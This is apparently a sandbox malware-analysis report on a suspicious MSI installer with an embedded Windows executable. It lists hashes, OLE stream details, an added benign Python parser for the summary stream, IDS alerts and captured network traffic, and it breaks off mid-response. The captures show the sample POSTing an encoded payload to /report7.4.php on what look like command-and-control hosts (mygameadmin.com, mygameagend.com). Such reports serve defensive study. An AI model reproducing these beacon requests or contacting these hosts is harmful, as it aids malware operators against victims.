                                                                                  Preview: .To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, MSI Installer, Code page: 1252, Last Printed: Fri Sep 18 11:48:09 2009, Create Time/Date: Fri Sep 18 11:48:09 2009, Name of Creating Application: Windows Installer, Title: exe2msiSetupPackage, Author: QwertyLab, Template: Intel;1033, Last Saved By: dmitry, Revision Number: {CDFF8FBF-8895-4382-936D-A20B4780ACE1}, Last Saved Time/Date: Fri Sep 18 14:10:05 2009, Number of Pages: 200, Number of Words: 2, Security: 1
                                                                                  Entropy (8bit):7.9317963528183935
                                                                                  TrID:
                                                                                  • Microsoft Windows Installer (77509/1) 90.59%
                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 9.36%
                                                                                  • Corel Photo Paint (41/41) 0.05%
                                                                                  File name:6rfyiAq0nM.msi
                                                                                  File size:7306752
                                                                                  MD5:623673851fbb205eb0d1003cb892d4d6
                                                                                  SHA1:c541b4e10541bb0a6565ba8cc6b64d2480ef4437
                                                                                  SHA256:71a98e982a9dde0ffcf9a46554b7abaf947ac4c33f3a3b35df1a58b0064d0704
                                                                                  SHA512:ae40bb582937b32c25e0a465cac75106b04f6e0880cbf0e920f9c0dd80d7dd3e71a9c62ba8607375d7200675d4b4f18571745e00bd920418a662955e4be23669
                                                                                  SSDEEP:196608:8GTKBLeU6tpYgnZhKMBSZXnjfxLn1MUAJShcHgJ6M8YY:8GmcTpRGZ3jtn1IShcc8YY
                                                                                  File Content Preview:........................>...................p...............A...................f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...{...|...}...~..............................................................................

                                                                                  File Icon

                                                                                  Icon Hash:a2a0b496b2caca72

                                                                                  Static OLE Info

                                                                                  General

                                                                                  Document Type:OLE
                                                                                  Number of OLE Files:1

                                                                                  OLE File "6rfyiAq0nM.msi"

                                                                                  Indicators

                                                                                  Has Summary Info:True
                                                                                  Application Name:Windows Installer
                                                                                  Encrypted Document:True
                                                                                  Contains Word Document Stream:False
                                                                                  Contains Workbook/Book Stream:False
                                                                                  Contains PowerPoint Document Stream:False
                                                                                  Contains Visio Document Stream:False
                                                                                  Contains ObjectPool Stream:
                                                                                  Flash Objects Count:
                                                                                  Contains VBA Macros:False

                                                                                  Summary

                                                                                  Code Page:1252
                                                                                  Title:exe2msiSetupPackage
                                                                                  Subject:
                                                                                  Author:QwertyLab
                                                                                  Keywords:
                                                                                  Comments:
                                                                                  Template:Intel;1033
                                                                                  Last Saved By:dmitry
                                                                                  Revision Number:{CDFF8FBF-8895-4382-936D-A20B4780ACE1}
                                                                                  Last Printed:2009-09-18 10:48:09.509000
                                                                                  Create Time:2009-09-18 10:48:09.509000
                                                                                  Last Saved Time:2009-09-18 13:10:05.783000
                                                                                  Number of Pages:200
                                                                                  Number of Words:2
                                                                                  Creating Application:Windows Installer
                                                                                  Security:1

                                                                                  Streams

                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 448
                                                                                  General
                                                                                  Stream Path:\x5SummaryInformation
                                                                                  File Type:data
                                                                                  Stream Size:448
                                                                                  Entropy:3.98974006197
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . < . . . . . . . l . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . P e . . M 8 . . @ . . . P e . . M 8 . . . . . . . . . . W i n d o w s I n s t a l l e r . . . . . . . . . . . e x e 2
                                                                                  Data Raw:fe ff 00 00 06 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 90 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 0b 00 00 00 90 00 00 00 0c 00 00 00 9c 00 00 00 12 00 00 00 a8 00 00 00 02 00 00 00 c4 00 00 00 03 00 00 00 e0 00 00 00 04 00 00 00 ec 00 00 00 05 00 00 00 00 01 00 00 06 00 00 00 0c 01 00 00
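The \x5SummaryInformation stream above is an OLE property set (MS-OLEPS): the Summary fields listed further down in this section (Title, Author, Revision Number, Number of Pages, ...) are reached through a table of (property ID, offset) pairs at the start of the stream's single section. The parser below is an added example, not part of the Joe Sandbox report. It reads that directory from the 128-byte Data Raw dump shown above, which is constructed here from the report's hex; the dump is truncated, so the parser reports how many of the 16 entries it could see and does not try to read the values, which begin at section offset 0x88, past the end of the dump. The PID-to-name table is the standard SummaryInformation property set; the MSI-specific meanings in the comments follow the Windows Installer summary-property documentation.

```python
"""Parse the PropertySetStream directory of an MSI \\x05SummaryInformation stream.

Added example for this report, not code from Joe Sandbox or Windows Installer.
Input is the (truncated) 'Data Raw' hex dump printed above for the stream.
"""
import struct
import uuid

# First 128 bytes of the 448-byte \x05SummaryInformation stream, copied from the report.
SUMMARY_INFO_PREFIX = bytes.fromhex(
    "fe ff 00 00 06 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 "
    "90 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 0b 00 00 00 90 00 00 00 "
    "0c 00 00 00 9c 00 00 00 12 00 00 00 a8 00 00 00 02 00 00 00 c4 00 00 00 "
    "03 00 00 00 e0 00 00 00 04 00 00 00 ec 00 00 00 05 00 00 00 00 01 00 00 "
    "06 00 00 00 0c 01 00 00"
)

# Well-known FMTID of the SummaryInformation property set (MS-OLEPS).
FMTID_SUMMARY_INFORMATION = uuid.UUID("F29F85E0-4FF9-1068-AB91-08002B27B3D9")

# Standard SummaryInformation property IDs. Windows Installer reuses several of
# them: PID 7 Template = platform;language, PID 14 PageCount = minimum installer
# version (200 -> 2.0), PID 15 WordCount = source image flags, PID 19 Security.
PID_NAMES = {
    1: "CodePage", 2: "Title", 3: "Subject", 4: "Author", 5: "Keywords",
    6: "Comments", 7: "Template", 8: "LastSavedBy", 9: "RevisionNumber",
    10: "EditTime", 11: "LastPrinted", 12: "CreateTime", 13: "LastSavedTime",
    14: "PageCount", 15: "WordCount", 16: "CharCount", 17: "Thumbnail",
    18: "CreatingApplication", 19: "Security",
}


def parse_property_set_directory(data: bytes) -> dict:
    """Parse the stream header and the section's (PID, offset) table.

    Works on a truncated buffer: only the pairs actually present are returned
    and 'truncated' tells whether the table was cut short. Values are not read.
    """
    byte_order, version, sys_id, _clsid, num_sets = struct.unpack_from("<HHI16sI", data, 0)
    if byte_order != 0xFFFE:
        raise ValueError("not a property set stream (byte-order mark is not FFFE)")
    fmtid_raw, section_offset = struct.unpack_from("<16sI", data, 28)
    fmtid = uuid.UUID(bytes_le=fmtid_raw)           # GUID fields are little-endian
    section_size, prop_count = struct.unpack_from("<II", data, section_offset)

    entries = []
    pos = section_offset + 8
    for _ in range(prop_count):
        if pos + 8 > len(data):                      # dump ends inside the table
            break
        pid, offset = struct.unpack_from("<II", data, pos)
        entries.append((pid, PID_NAMES.get(pid, f"PID{pid}"), offset))
        pos += 8

    return {
        "version": version,
        "os_major": sys_id & 0xFF,                   # SystemIdentifier: major, minor, OS type
        "os_minor": (sys_id >> 8) & 0xFF,
        "os_type": sys_id >> 16,
        "num_property_sets": num_sets,
        "fmtid": fmtid,
        "is_summary_information": fmtid == FMTID_SUMMARY_INFORMATION,
        "section_offset": section_offset,
        "section_size": section_size,
        "stream_size": section_offset + section_size,   # should equal the reported stream size
        "property_count": prop_count,
        "directory_end": 8 + 8 * prop_count,            # section-relative offset of the first value
        "entries": entries,
        "truncated": len(entries) < prop_count,
    }


if __name__ == "__main__":
    info = parse_property_set_directory(SUMMARY_INFO_PREFIX)
    print(f"FMTID {info['fmtid']} summary={info['is_summary_information']} "
          f"OS {info['os_major']}.{info['os_minor']} stream_size={info['stream_size']}")
    print(f"{info['property_count']} properties, directory ends at section offset "
          f"{info['directory_end']:#x}, truncated={info['truncated']}")
    for pid, name, offset in info["entries"]:
        print(f"  PID {pid:2} {name:20} @ section+{offset:#06x}")
```

Two consistency checks fall out of the parse: the section offset plus section size equals the 448-byte stream size the report lists, and the first property offset (0x88) equals 8 + 8 * 16, which confirms the 16-entry count matches the 16 Summary fields shown below.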
                                                                                  Stream Path: \x17163\x16689\x18229\x18430\x14797\x14413\x14465\x14351\x14916\x14987\x14977\x14662\x15045\x15173\x14985\x15169\x14784\x14464\x15245\x14670, File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Stream Size: 7196212
                                                                                  General
                                                                                  Stream Path:\x17163\x16689\x18229\x18430\x14797\x14413\x14465\x14351\x14916\x14987\x14977\x14662\x15045\x15173\x14985\x15169\x14784\x14464\x15245\x14670
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Stream Size:7196212
                                                                                  Entropy:7.9486797875
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:M Z P . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! . . T h i s p r o g r a m m u s t b e r u n u n d e r W i n 3 2 . . $ 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00
                                                                                  Stream Path: \x18496\x15167\x17394\x17464\x17841, File Type: data, Stream Size: 3280
                                                                                  General
                                                                                  Stream Path:\x18496\x15167\x17394\x17464\x17841
                                                                                  File Type:data
                                                                                  Stream Size:3280
                                                                                  Entropy:5.27810535323
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . % . % . % . ' . ' . ' . - . - . - . - . - . - . - . - . 1 . 1 . 1 . 2 . 2 . 2 . 3 . 3 . 3 . 4 . 4 . 4 . 4 . 4 . 4 . 4 . = . = . > . > . F . F . F . F . F . F . F . F . F . N . N . N . N . ` . ` . ` . j . j . n . n . p . p . p . p . p . p . p . p . y . y . y . y . y . y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 1f 00 1f 00 1f 00 25 00 25 00 25 00 27 00 27 00 27 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 31 00 31 00 31 00 32 00 32 00 32 00 33 00 33 00 33 00 34 00 34 00 34 00 34 00 34 00 34 00 34 00 3d 00 3d 00 3e 00 3e 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 4e 00 4e 00 4e 00 4e 00 60 00 60 00 60 00 6a 00
                                                                                  Stream Path: \x18496\x16191\x17783\x17516\x15210\x17892\x18468, File Type: ASCII text, with very long lines, with no line terminators, Stream Size: 29802
                                                                                  General
                                                                                  Stream Path:\x18496\x16191\x17783\x17516\x15210\x17892\x18468
                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                  Stream Size:29802
                                                                                  Entropy:4.69223735488
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:N a m e T a b l e T y p e _ V a l i d a t i o n C o l u m n N u l l a b l e M i n V a l u e M a x V a l u e K e y T a b l e K e y C o l u m n C a t e g o r y S e t D e s c r i p t i o n N I d e n t i f i e r N a m e o f t a b l e N a m e o f c o l u m n Y T e x t D e s c r i p t i o n o f c o l u m n S e t o f v a l u e s t h a t a r e p e r m i t t e d T e x t ; F o r m a t t e d ; T e m p l a t e ; C o n d i t i o n ; G u i d ; P a t h ; V e r s i o n ; L a n g u a g e ; I d e n t i
                                                                                  Data Raw:4e 61 6d 65 54 61 62 6c 65 54 79 70 65 5f 56 61 6c 69 64 61 74 69 6f 6e 43 6f 6c 75 6d 6e 4e 75 6c 6c 61 62 6c 65 4d 69 6e 56 61 6c 75 65 4d 61 78 56 61 6c 75 65 4b 65 79 54 61 62 6c 65 4b 65 79 43 6f 6c 75 6d 6e 43 61 74 65 67 6f 72 79 53 65 74 44 65 73 63 72 69 70 74 69 6f 6e 4e 49 64 65 6e 74 69 66 69 65 72 4e 61 6d 65 20 6f 66 20 74 61 62 6c 65 4e 61 6d 65 20 6f 66 20 63 6f 6c
                                                                                  Stream Path: \x18496\x16191\x17783\x17516\x15978\x17586\x18479, File Type: data, Stream Size: 3008
                                                                                  General
                                                                                  Stream Path:\x18496\x16191\x17783\x17516\x15978\x17586\x18479
                                                                                  File Type:data
                                                                                  Stream Size:3008
                                                                                  Entropy:3.52620475136
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G . . . . . . . . . . . . . . . . $ . . . 6 . . . . . . . . . . . . . . . . . . . . . . . T . . . . . . . . . . . . . . . j . . . . . . . B . . . . . ( . . . . . . . . . o . . . M . . . . . . . . . . . . . . . . . . . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . . . . . ( . . .
                                                                                  Data Raw:e4 04 00 00 04 00 14 00 05 00 06 00 00 00 00 00 04 00 0c 00 0b 00 15 00 06 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 09 00 02 00 08 00 02 00 03 00 02 00 0b 00 18 00 01 00 02 01 0a 00 99 00 0d 00 01 00 0e 00 01 00 01 00 ac 00 04 00 47 00 15 00 01 00 20 00 01 00 ca 00 01 00 0f 00 01 00 24 00 01 00 36 00 01 00 15 00 01 00 15 00 01 00 05 00 01 00 1e 00 01 00 0a 00 07 00
                                                                                  Stream Path: \x18496\x16255\x16740\x16943\x18486, File Type: data, Stream Size: 172, Entropy: 4.83586062657, Base64 Encoded: False
                                                                                  Stream Path: \x18496\x16383\x17380\x16876\x17892\x17580\x18481, File Type: data, Stream Size: 10176, Entropy: 2.8257387661, Base64 Encoded: False
                                                                                  Stream Path: \x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 54, Entropy: 3.64425475307, Base64 Encoded: False
                                                                                  Stream Path: \x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 84, Entropy: 3.94190859404, Base64 Encoded: False
                                                                                  Stream Path: \x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486, File Type: data, Stream Size: 4, Entropy: 1.5, Base64 Encoded: False
                                                                                  Stream Path: \x18496\x16911\x17892\x17784\x18472, File Type: data, Stream Size: 16, Entropy: 2.17742128383, Base64 Encoded: False
                                                                                  Stream Path: \x18496\x16918\x17191\x18468, File Type: MIPSEB Ucode, Stream Size: 12, Entropy: 1.25162916739, Base64 Encoded: False
                                                                                  Stream Path: \x18496\x17163\x16689\x18229, File Type: data, Stream Size: 4, Entropy: 2.0, Base64 Encoded: False
                                                                                  Stream Path: \x18496\x17165\x16949\x17894\x17778\x18492, File Type: data, Stream Size: 18, Entropy: 2.46132014021, Base64 Encoded: False
                                                                                  Stream Path: \x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 384, Entropy: 4.95816205211, Base64 Encoded: False
                                                                                  Stream Path: \x18496\x17548\x17648\x17522\x17512\x18487, File Type: data, Stream Size: 12, Entropy: 2.52205520887, Base64 Encoded: False
                                                                                  Stream Path: \x18496\x17558\x17959\x16943\x17180\x17514\x17892\x17784\x18472, File Type: data, Stream Size: 6, Entropy: 2.25162916739, Base64 Encoded: False
                                                                                  Stream Path: \x18496\x17753\x17650\x17768\x18231, File Type: data, Stream Size: 60, Entropy: 3.38677863114, Base64 Encoded: False
                                                                                  Stream Path: \x18496\x17932\x17910\x17458\x16778\x17207\x17522, File Type: data, Stream Size: 16, Entropy: 2.90563906223, Base64 Encoded: False

                                                                                  Network Behavior

                                                                                  Snort IDS Alerts

                                                                                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                                  10/24/21-12:49:34.014326 | UDP | 1948 | DNS zone transfer UDP | 60785 | 53 | 192.168.2.3 | 34.64.183.91
                                                                                  10/24/21-12:49:42.697753 | UDP | 1948 | DNS zone transfer UDP | 60785 | 53 | 192.168.2.3 | 34.64.183.91
                                                                                  10/24/21-12:49:47.628452 | UDP | 1948 | DNS zone transfer UDP | 60785 | 53 | 192.168.2.3 | 34.64.183.91
                                                                                  10/24/21-12:49:58.425112 | UDP | 1948 | DNS zone transfer UDP | 60785 | 53 | 192.168.2.3 | 34.64.183.91
                                                                                  10/24/21-12:50:06.100895 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | - | - | 192.168.2.3 | 34.64.183.91
                                                                                  10/24/21-12:50:06.820513 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | - | - | 192.168.2.3 | 34.64.183.91
                                                                                  10/24/21-12:50:07.902093 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | - | - | 192.168.2.3 | 34.64.183.91
                                                                                  10/24/21-12:50:09.460402 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | - | - | 192.168.2.3 | 34.64.183.91
                                                                                  10/24/21-12:50:10.421239 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | - | - | 192.168.2.3 | 34.64.183.91
                                                                                  10/24/21-12:51:41.901821 | UDP | 1948 | DNS zone transfer UDP | 53947 | 53 | 192.168.2.3 | 34.64.183.91

                                                                                  Network Port Distribution

                                                                                  UDP Packets

                                                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                  Oct 24, 2021 12:49:25.744143963 CEST | 64021 | 53 | 192.168.2.3 | 8.8.8.8
                                                                                  Oct 24, 2021 12:49:25.744909048 CEST | 60784 | 53 | 192.168.2.3 | 8.8.8.8
                                                                                  Oct 24, 2021 12:49:25.765116930 CEST | 53 | 64021 | 8.8.8.8 | 192.168.2.3
                                                                                  Oct 24, 2021 12:49:25.769309044 CEST | 53 | 60784 | 8.8.8.8 | 192.168.2.3

                                                                                  DNS Queries

                                                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                                  Oct 24, 2021 12:49:25.744143963 CEST | 192.168.2.3 | 8.8.8.8 | 0x5e85 | Standard query (0) | toa.mygametoa.com | A (IP address) | IN (0x0001)
                                                                                  Oct 24, 2021 12:49:25.744909048 CEST | 192.168.2.3 | 8.8.8.8 | 0xdd65 | Standard query (0) | toa.mygametoa.com | 28 | IN (0x0001)

                                                                                  DNS Answers

                                                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                                  Oct 24, 2021 12:49:25.765116930 CEST | 8.8.8.8 | 192.168.2.3 | 0x5e85 | No error (0) | toa.mygametoa.com | - | 34.64.183.91 | A (IP address) | IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • bh.mygameadmin.com
                                                                                  • fg.mygameagend.com

                                                                                  HTTPS Proxied Packets

                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  0 | 192.168.2.3 | 49805 | 104.21.75.46 | 443 | C:\Windows\System32\svchost.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  2021-10-24 10:50:06 UTC | 0 | OUT | POST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: bh.mygameadmin.com
                                                                                  Content-Length: 278
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2021-10-24 10:50:06 UTC | 0 | OUT | Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbX1Nai19bfoteoqaKpqaagpKZjZ3lsb2J7b3im3qSmq4ff3Jmtmqiq1quq19aHqNyqh9aG1Kupm9$fmq2GhpimoKSmY2p7lqbepKbcot@moKSmlnt9b2Vipt6kpr6dpqCkpmifl
                                                                                  2021-10-24 10:50:06 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:06 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jdf50sAmKZd6hLj9ndhfpyKIog6ideF2zxWcBaYKj894GXG0PFqHMV8vHTZYdmXG7Y%2FQZs0GQPAaX2O89bWX2YaOvd8H1CAkVAsqSmhb2pw28sUNeAGhJVPDz95OyfMf1YXMv2Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a46d09d06958-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                  2021-10-24 10:50:06 UTC | 1 | IN | Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                  2021-10-24 10:50:06 UTC | 1 | IN | Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  1 | 192.168.2.3 | 49807 | 172.67.167.122 | 443 | C:\Windows\System32\svchost.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  2021-10-24 10:50:06 UTC | 1 | OUT | POST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: fg.mygameagend.com
                                                                                  Content-Length: 278
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2021-10-24 10:50:06 UTC | 1 | OUT | Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbX1Nai19bfoteoqaKpqaagpKZjZ3lsb2J7b3im3qSmq4ff3Jmtmqiq1quq19aHqNyqh9aG1Kupm9$fmq2GhpimoKSmY2p7lqbepKbcot@moKSmlnt9b2Vipt6kpr6dpqCkpmifl
                                                                                  2021-10-24 10:50:07 UTC | 1 | IN | HTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:07 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z6hUjLumL9CnwY4P8w5uIjqoOwpKUS1DgjCVcTv6q4LTeqn2T%2FhuwPLK4yZM81PbWzttV8PlbDYtQQKcoxFizdU5vAxrou1x8DtbL%2FCs8csw%2Fxw9kqeJG6mZZwkJqHkGLQ0Oh3s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a47199059aaa-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                  2021-10-24 10:50:07 UTC | 2 | IN | Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                  2021-10-24 10:50:07 UTC | 2 | IN | Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  2 | 192.168.2.3 | 49808 | 104.21.75.46 | 443 | C:\Windows\System32\svchost.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  2021-10-24 10:50:07 UTC | 2 | OUT | POST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: bh.mygameadmin.com
                                                                                  Content-Length: 278
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2021-10-24 10:50:07 UTC3OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 61 47 6c 6d 56 74 61 58 75 57 70 74 36 6b 70 70 6d 31 74 62 57 31 70 71 43 6b 70 6d 6c 6f 5a 32 68 37 70 74 36 6b 31 35 4f 67 70 4b 5a 76 6c 4b 62 65 70 4b 62 58 31 4e 61 69 31 39 62 66 6f 74 65 6f 71 61 4b 70 71 61 61 67 70 4b 5a 6a 5a 33 6c 73 62 32 4a 37 62 33 69 6d 33 71 53 6d 71 34 66 66 33 4a 6d 74 6d 71 69 71 31 71 75 71 31 39 61 48 71 4e 79 71 68 39 61 47 31 4b 75 70 6d 39 24 66 6d 71 32 47 68 70 69 6d 6f 4b 53 6d 59 32 70 37 6c 71 62 65 70 4b 62 63 6f 74 40 6d 6f 4b 53 6d 6c 6e 74 39 62 32 56 69 70 74 36 6b 70 72 36 64 70 71 43 6b 70 6d 69 66 6c
                                                                                  Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbX1Nai19bfoteoqaKpqaagpKZjZ3lsb2J7b3im3qSmq4ff3Jmtmqiq1quq19aHqNyqh9aG1Kupm9$fmq2GhpimoKSmY2p7lqbepKbcot@moKSmlnt9b2Vipt6kpr6dpqCkpmifl
                                                                                  2021-10-24 10:50:08 UTC3INHTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:08 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
